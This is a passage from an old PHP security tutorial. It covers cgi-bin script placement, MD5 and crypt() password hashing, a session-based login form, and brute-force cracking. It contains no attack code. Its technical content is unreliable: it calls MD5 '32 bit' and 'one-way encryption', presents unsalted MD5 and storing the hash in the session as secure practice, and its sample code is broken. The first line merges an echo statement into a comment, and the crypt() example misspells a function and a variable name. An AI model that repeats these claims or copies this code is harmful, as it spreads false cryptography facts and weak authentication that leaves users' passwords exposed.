#!/usr/bin/php
// if the path to PHP is different, then you'll have to change that lineecho "<html>n<body>nTesting!n</body>n</html>";

Save this as something like ‘test.php’ and put it in your cgi-bin directory. From your web browser, try to execute it. If it works, then it’s a good idea to use your scripts in that style in the cgi-bin to prevent code leakage. If it doesn’t work, then either e-mail your admin or rebuild your PHP/Apache or whatever installation to include this option.

An entirely different topic in PHP security is encryption. There are many different kinds of encryption, but compared to other languages PHP makes them all easy as pie. The easiest example of encryption is the one-way 32 bit MD5 encryption. “One way” encryption means that the data CANNOT be decrypted. This means that even if the attacker gets the encrypted data, they cannot decrypt, but instead will have to ‘crack’ it. For example, let’s say we have a password file in our home directory (‘/home/user/pass_info.php’):

<?php
$user = 'testuser';
$pass = md5("mypasswd");
?>

The md5() function converts “mypasswd” to a 32 bit “hash” (encrypted data, basically) that is about 32 or so characters long and each character is either a letter or a number. Any other text than “mypasswd” will produce a different hash, so we can rely on what the encrypted version of “mypasswd” is. Now that we have $pass set, let’s say we have another script like this that sets the user’s $_SESSION data to show he or she is logged in according to their password:

<?php
include("/home/user/pass_info.php");if (isSet($_SESSION['user']) && isSet($_SESSION['pass']) && $_SESSION['user'] == $user && $_SESSION['pass'] == $pass)
{
echo 'You are logged in.';
}
else if (isSet($_POST['user']) && isSet($_POST['pass']) && $_POST['user'] == $user && md5($_POST['pass']) == $pass)
{
$_SESSION['user'] = $user;
$_SESSION['pass'] = $pass;
?>
<script language="JavaScript" type="text/javascript">
alert("you are now logged in");
window.location.href = window.location.href;
</script>
<?php
}
else
{
?>
<form action="?" method="post">
<input type="text" name="user"><br>
<input type="password" name="pass"><br>
<input type="submit" value="Login">
</form>
<?php
}
?>

In this way, $_SESSION['pass'] is a 32 bit encrypted hash instead of a plaintext password. If the attacker was to get your $_SESSION data and see that a variable names $_SESSION['pass'] was equal to a plaintext password, then he/she just cracked your user/pass! Now that we have it encrypted via md5(), he/she can only see the encrypted version. Now the attacker would have to run a bruteforce style attack on your encrypted password data which can take months depending on how good your password is. (This is also a good reason to change passwords often.)

If you think that md5() is out of your style, or you just want to use a different encryption key, you can use crypt() as well. crypt() uses the same method as UNIX /etc/passwd files, and is farely simple. First, let’s encrypt a string:

<?php
$encryptedData = crypt("testPass");
?>

Now, let’s make a function to compare your crypt() data with a string to see if the password is correct:

<?php
function verifyEncryptedData($str, $data)
{
$salt = substr($data, 0, CRYPT_SALT_LENGTH); // gets the crypt() encryption key into $salt
$encryptedStr = crypt($str, $salt); // encrypt the given data using the current key
return ($encryptedStr == $data);
// returns a TRUE/FALSE statement based on if $str is indeed the encrypted test in $data
}
verifyEncryptedData("testPass", $encryptedData); // should return TRUE
verifyEncrytpedData("hahaha", $encyptedData); // should return FALSE
?>

Here we see an example of encryption that uses different encryption ‘keys’, where as md5() uses the same key every time. crypt() generates a random key every time something is encrypted with it.

Now you may be wondering what I was talking about when I said an attacker would try a brute-force attack on your encrypted data. This means that he/she would try to encrypt every possible value from a-z 1-9 for however many characters it takes in whatever kind of encryption you are using until they have cracked the password. Let’s say you had a password of the letter ‘c’. A brute force program would first try to encrypt ‘a’ without success, ‘b’ without success, and then found out your password when it tries ‘c’. As you can see, the more characters and the more different of a letter/number/symbol combination you use in a password will make a password cracking program take longer to crack your password. Your best bet is to change passwords often so that even if he/she cracks the password, they’ll return to find that you’ve already changed the password and they’ll have to start all over again.

If you want to use encryption that allows you to decrypt its contents, look into PHP’s mcrypt module. (http://www.php.net/ comes in handy, folks!) It’s the best encryption module for PHP I know of as it lets you choose your encryption method from a wide selection though it takes just a tad bit of learning, but I’ll leave that up to you.

All in all, just use common sense and follow safe practices when it comes to PHP. Don’t let one vulnerable script be the reason your whole network gets cracked!

Read the entire article here.

Related reading: Minimum system requirements for Windows Vista.